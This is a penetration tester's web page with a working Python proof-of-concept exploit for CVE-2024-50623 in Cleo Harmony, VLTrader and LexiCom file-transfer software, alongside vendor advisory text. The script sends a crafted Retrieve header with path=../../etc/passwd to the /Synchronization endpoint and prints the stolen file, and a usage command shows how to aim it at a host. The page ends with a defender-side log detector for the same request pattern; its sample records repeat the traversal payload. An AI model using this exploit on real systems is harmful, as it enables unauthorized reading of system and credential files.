congdong007

Penetration Test、Software Developer

Cleo Harmony File Transfer Software Arbitrary File Read Vulnerability (CVE-2024-50623) PoC

Description

    Cleo has identified an unrestricted file upload and download vulnerability (CVE-2024-50623) that could lead to remote code execution.

    The vulnerability affects the following products:

    Cleo Harmony® (prior to version 5.8.0.21)
    Cleo VLTrader® (prior to version 5.8.0.21)
    Cleo LexiCom® (prior to version 5.8.0.21)

    Cleo strongly advises all customers to immediately upgrade instances of Harmony, VLTrader, and LexiCom to the latest released patch (version 5.8.0.21) to address additional discovered potential attack vectors of the vulnerability.

    Please visit Unrestricted File Upload and Download Vulnerability Mitigation to take immediate action.

Scope of impact

Proof of Concept (Python Code)

#!/usr/bin/python3
# Title: Cleo Harmony File Transfer Software Arbitrary File Read Vulnerability (CVE-2024-50623)
# Date : 2025-04-01
# Author: Dong Cong
#
# ZXJpYy5jb25nZG9uZ0BnbWFpbC5jb20=
#
# CVE : 2024-50623

import requests
import argparse
import warnings

warnings.filterwarnings("ignore")

# Endpoint that processes the Retrieve header
url0 = '/Synchronization'

parser = argparse.ArgumentParser()
parser.add_argument("--host", help="input the vulnerable host", type=str)
args = parser.parse_args()

# Base URL of the host, in the form http://xx.xx.xx.xx:xxxx
host = args.host

print(host)

# Duplicate keys: Python keeps only the last 'csrftoken' value.
cookies = {
    'csrftoken': 'z1GtnjQWsIKwGazlFX7V',
    'csrftoken': 'NX6iujIUcamW9umprA1vx19dzU6EZNLa',
    'csrftoken': 'kZ4jVQ4uZtITYtnweSsVDUEwZ2ltraTF',
}

# The path= field of the Retrieve header names the file to read.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0',
    'Accept': '*/*',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Connection': 'keep-alive',
    'Priority': 'u=4',
    'Retrieve': 'l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;s=True;b=False;pp=1337;path=../../etc/passwd',
}

try:
    response = requests.get(f'{host}{url0}', cookies=cookies, headers=headers, timeout=5)
    if response.status_code == 200:
        # Print the response length, then the returned file content
        print(f'************************ {len(response.text)} ************************\n')
        print(response.text)
except requests.exceptions.HTTPError as http_err:
    print(f"HTTP 错误: {http_err}")
except requests.exceptions.ConnectionError as conn_err:
    print(f"连接错误: {conn_err}")
except requests.exceptions.Timeout as timeout_err:
    print(f"请求超时: {timeout_err}")
except requests.exceptions.RequestException as req_err:
    print(f"请求错误: {req_err}")

The following command shows how to execute the script:

python test_poc.py --host http://192.168.0.1:8983
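
A defender-side check for the request shape the PoC above sends (added example, not part of the original post or of Cleo's software): it scans proxy or WAF records for `/Synchronization` requests whose `Retrieve` header carries a `path=` field containing `..` segments. The JSON-lines log layout, the field names `client`, `uri` and `headers`, and the sample records are assumptions constructed for illustration.

```python
import json
from urllib.parse import unquote

SYNC_ENDPOINT = "/Synchronization"   # endpoint the PoC on this page requests
SYNC_HEADER = "retrieve"             # header that carries path= in the PoC

def parse_fields(header_value):
    """Split 'k=v;k=v' (the layout of the PoC's Retrieve header) into a dict."""
    fields = {}
    for part in header_value.split(";"):
        key, sep, val = part.strip().partition("=")
        if sep:
            fields[key.lower()] = val
    return fields

def has_traversal(path):
    """True if any segment is '..' after percent-decoding and slash normalization."""
    for _ in range(3):               # unwrap up to three layers of encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return ".." in path.replace("\\", "/").split("/")

def find_suspicious(log_lines):
    """Return (client, decoded-as-logged path) for each request matching the pattern."""
    hits = []
    for line in log_lines:
        rec = json.loads(line)
        if rec["uri"].split("?")[0].rstrip("/") != SYNC_ENDPOINT:
            continue
        headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
        path = parse_fields(headers.get(SYNC_HEADER, "")).get("path")
        if path is not None and has_traversal(path):
            hits.append((rec["client"], path))
    return hits

# Constructed sample records (hypothetical JSON-lines proxy log, documentation IPs).
SAMPLE_LOG = [
    '{"client": "203.0.113.7", "uri": "/Synchronization", "headers": {"Retrieve": "l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;s=True;b=False;pp=1337;path=../../etc/passwd"}}',
    '{"client": "203.0.113.8", "uri": "/Synchronization/", "headers": {"retrieve": "n=VLTrader;path=../../etc/passwd"}}',
    '{"client": "198.51.100.4", "uri": "/Synchronization", "headers": {"Retrieve": "n=VLTrader;path=conf/sample.xml"}}',
    '{"client": "198.51.100.9", "uri": "/index.html", "headers": {"User-Agent": "Mozilla/5.0"}}',
]

if __name__ == "__main__":
    for client, path in find_suspicious(SAMPLE_LOG):
        print(f"suspicious Synchronization request from {client}: path={path}")
```

Header names are matched case-insensitively and the path is normalized before the check, so the rule does not depend on the exact byte form used in the PoC. Any hit on a host running a version prior to 5.8.0.21 warrants review of what that response returned.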